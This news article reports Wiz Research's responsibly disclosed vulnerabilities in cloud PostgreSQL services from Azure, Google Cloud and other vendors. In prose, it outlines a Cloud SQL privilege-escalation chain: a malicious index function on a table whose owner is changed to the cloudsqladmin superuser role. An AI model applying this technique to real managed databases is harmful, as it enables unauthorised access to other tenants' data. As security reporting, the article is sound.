picture

picture

Vulnerabilities have emerged in several PostgreSQL-as-a-service products, including products from two cloud giants, Microsoft and Google.

Security firm Wiz Research recently discovered vulnerabilities in the best-selling "PostgreSQL-as-a-Service" offerings from multiple cloud vendors that were brought on by the cloud vendors themselves.

Earlier this year, the security firm discovered a series of critical vulnerabilities in Microsoft Azure Database for PostgreSQL Flexible Server.

The vulnerability, named #ExtraReplica, allows unauthorized visitors to read other customers' PostgreSQL databases, thereby bypassing tenant isolation mechanisms.

Shir Tamari, director of research at Wiz, told the media: "The isolation mechanism is not perfect, we can access other customers' instances from our managed instances over the network, which opens up the attack surface for other potential vulnerabilities."

The company demonstrated that criminals could exploit this attack surface to gain full access to other customers' databases.

picture
Vulnerabilities from decades ago

Wiz has now revealed that a similar vulnerability affects Google Cloud Platform (GCP), though the potential impact is less severe.

PostgreSQL, which dates back 25 years, lacked a permissions model suitable for managed services, forcing cloud providers to add their own code.

In order to turn Postgres into a managed service, cloud service providers need to provide users with superuser privileges without compromising the service, by allowing some features that are considered dangerous.

PostgreSQL's privilege model cannot provide users with a set of superuser privileges. As a result, cloud providers had to make changes to allow regular users to have a set of superuser capabilities.

The change allowed Wiz's team to execute arbitrary commands on compute instances managed by multiple vendors of PostgreSQL-as-a-service offerings -- in extreme cases, unauthorized visitors could access the data of other customers using the affected service.

picture
There are multiple patches

Take Cloud SQL as an example, although Wiz's team cannot gain superuser status, they can access some of its permissions. One of these permissions is the ability to arbitrarily change the ownership of a table to any user or role in the database.

This means that the team can create a table with fake content, then create a malicious index function on the table with a code execution payload, and then change the owner of the table to cloudsqladmin, the superuser role of GCP, which only Used by Cloud SQL to maintain and manage the database.

After analyzing the table, Wiz's team forced the PostgreSQL engine to context switch the user to cloudsqladmin, the owner of the table, and invoke the malicious index function with cloudsqladmin privileges, thereby executing shell commands.

Wiz's team worked with more than a dozen PostgreSQL vendors during the vulnerability research to verify and fix the issues found. It turns out that many cloud providers made the same modification in order to adapt PostgreSQL as a managed service and therefore could face security risks.

"As part of an extensive and responsible disclosure process, we communicated our findings to several of the major cloud vendors and others to help them determine whether they have any issues we identified," Tamari said.

Reference and source: https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases

picture

picture